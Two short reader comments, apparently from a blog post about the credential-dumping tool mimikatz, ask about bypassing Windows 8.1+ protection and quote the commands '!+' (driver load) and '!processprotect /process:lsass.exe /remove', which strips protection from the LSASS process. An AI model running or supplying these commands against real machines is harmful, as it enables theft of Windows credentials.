107. will it also bypass the window 8.1 and above security feature where mimikatz will not have privilege to attach to it.??

108. Hello:
Excellent work.
I have 2 questions and sorry about my little knowledge.

First, Using command: !+
will elevate privileges to run as a driver.
?This will be set permanent in Registry?
Because after running this command 2 or more times gives Error:
ERROR kull_m_service_install ; StartService (0x00000003)
,that seems to be due to the fact that it is already running/already registered.

Second Q: ,After using command :
!processprotect /process:lsass.exe /remove
,this unProtection will be permanent or just until next computer Restart.?
